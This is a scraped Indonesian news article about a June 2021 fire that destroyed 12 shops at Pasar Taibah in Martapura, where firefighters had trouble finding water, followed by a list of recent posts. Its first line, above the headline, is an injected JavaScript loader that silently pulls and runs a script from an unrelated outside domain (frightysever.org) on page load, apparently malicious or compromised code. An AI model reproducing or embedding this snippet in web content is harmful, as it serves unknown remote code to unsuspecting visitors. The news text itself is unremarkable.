(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
HEADLINE

Kebakaran Pasar Taibah Martapura 12 Toko Ludes, Sumber Air Nyaris Tak Ada


KANALKALIMANTAN.COM, MARTAPURA – Kebakaran besar di Pasar Taibah yang terjadi jelang shalat Isya di Kota Martapura sedikitnya 12 toko ludes terbakar, Jumat (4/6/2021) pukul 19.35 Wita.

Jumlah bangunan terbakar itu didapat sementara dari pihak pengelola pasar Martapura.

Bangunan Pasar Taibah yang berada di Pasar Martapura berada tak jauh dari Masjid Agung Al Karomah Martapura atau lebih tepatnya sebelah timur masjid.

Baca juga : BREAKING NEWS. Pasar Taibah Martapura Membara Diamuk Api

Api berhasil dipadamkan unit gabungan pemadam kebakaran dari Martapura dan Kota Banjarbaru sekitar pukul 19.50 Wita. Saat memadamkan api, Barisan Pemadam Kebakaran (BPK) gabungan sempat kesulitan mencari sumber air.

“Sangat sulit mencari titik air di sini, sumur gali hampir tidak ada. Untung tadi ada mobil tangki sehingga api cepat dikuasai,” ujar Syarif, salah satu anggota BPK.

Sementara itu, dari Perusahaan Daerah Pasar Bauntung Batuah (PD PBB), Gusti Andri memastikan dari data sementara yang masuk kepada mereka ada 12 toko yang hangus dengan kerusakan yang sangat parah.

Pengelola pasar Martapura ini tak menampik sulitnya menemukan titik sumber air di kawasan pasar, akibatnya armada-armada BPK yang datang kesulitan dalam memadamkan api.

 

“Kita akan koordinasikan terkait penambahan sumber air di kawasan pasar,” janjinya.

Pihak PD PBB meminta kepada para pedagang selalu waspada dan berhati-hati.

Kobaran api terjadi saat jelang shalat Isya, kontan membuat warga Martapura geger dengan kebakaran yang terjadi di kawasan Pasar Martapura.

Api berkobar besar di Pasar Taibah yang lokasinya berdekatan dengan Masjid Agung Al Karomah -sebelah timur masjid- dan permukiman warga di Murung Masjid, Kelurahan Murung Keraton, Kecamatan Martapura.

Baca juga : Pemadam Berhasil Taklukkan Kebakaran di Pasar Taibah Martapura

Sebelumnya, kebakaran juga terjadi di kawasan Pasar Martapura. Tepatnya pada Minggu 16 Mei 2021 malam, puluhan lapak buah di Pasar Batuah terbakar. (kanalkalimantan.com/kk)

 

Reporter : Kk
Editor : Bie

 

 


Al Ghifari

Recent Posts

Syarat Dukungan Ditolak, Bakal Calon Perseorangan Pilwali Banjarmasin Ajukan Sengketa ke Bawaslu

KANALKALIMANTAN.COM, BANJARMASIN - Di awal tahapan Pemilihan Wali Kota dan Wakil Wali Kota (Pilwali) Banjarmasin… Read More

8 jam ago

ETLE Segera Terpasang di Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Sejumlah titik krusial pelanggaran lalu lintas dan kerawanan kecelakaan lalu lintas menjadi… Read More

8 jam ago

Dinas PUPR Kalsel Gelar Bimtek Pengelolaan Air Limbah

KANALKALIMANTAN.COM, BANJARMASIN - Dinas Pekerjaan Umum dan Penataan Ruang (PUPR) Provinsi Kalsel mengadakan kegiatan Bimbingan… Read More

9 jam ago

Rekomendasi Partai Tak Pasti, Jaya-Abdi Siap Jadi Penantang Petahana Aditya-Yuti

Jaya : Penantang Bisa Lebih dalam Mengevaluasi Kinerja Petahana Read More

10 jam ago

Lima Jabatan di Polres Banjarbaru Rotasi, 12 Personel Terima Penghargaan Kapolda

KANALKALIMANTAN.COM, BANJARBARU - Lima jabatan yang diisi para perwira pertama (Pama) di lingkungan Kepolisian Resor… Read More

11 jam ago

Nurgita Tiyas Berharap Guru Dapat Lebih Cakap Digital

KANALKALIMANTAN.COM, BANJARMASIN - Ketua TP PKK Kabupaten Banjar Hj Nurgita Tiyas menghadiri Talkshow Literasi Digital… Read More

11 jam ago

This website uses cookies.